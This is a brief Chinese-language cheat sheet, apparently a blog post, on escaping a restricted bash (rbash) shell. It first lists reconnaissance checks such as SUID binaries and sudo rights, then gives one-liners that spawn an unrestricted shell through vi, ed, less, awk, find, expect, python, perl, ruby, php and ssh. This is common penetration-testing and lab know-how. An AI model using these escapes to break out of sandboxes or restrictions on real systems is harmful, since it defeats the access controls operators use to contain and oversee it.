rbash逃脱

步骤
  1. 检查所有当前可以使用的命令,按两下tab键来列出当前能使用的所有命令。
  2. 检查配置了SUID的命令(别问啥是SUID,问也不说)。
  3. 检查sudo下可以使用的命令。
  4. 检查当前可以使用的脚本语言,例如python 或者expect。
  5. 检查重定向符号能不能使用。
  6. 检查特殊符号能否使用,例如“”“”,”&”等。
常用方法
  • 使用vi或者vim
    1. vi sss
    2. :!/bin/ls -l .b*
    3. :!/bin/bash
  • 使用ed
    1. ed
    2. !’/bin/sh’
  • 使用more或者less或者man
    1. more一个长到翻页的文件
    2. !’sh’
  • 使用pinfo
    1. pinfo ls
    2. !
  • 使用links
    1. links www.baidu.com
    2. 按esc,选择File->OS shell
  • 使用find命令
    1. find -exec可以执行系统命令
  • 使用awk命令
    1. awk ‘BEGIN {system(“/bin/sh”)}’
  • 使用expect命令
    1. expect
    2. spawn sh
    3. sh
  • 使用python
    1. python -c “import os; os.system(“/bin/sh”);”
  • 使用ruby
    1. irb
    2. exec ‘/bin/sh’
  • 使用perl
    1. perl -e ‘system(“sh -i”);’
  • 使用php
    1. php -a
    2. exec(“sh -i”);
  • ssh
    1. ssh xxx@xxx.xxx.xxx.xxx "export TERM=xterm; python -c 'import pty; pty.spawn(\"/bin/bash\")'"
文章目录
  1. 1. 步骤
  2. 2. 常用方法
,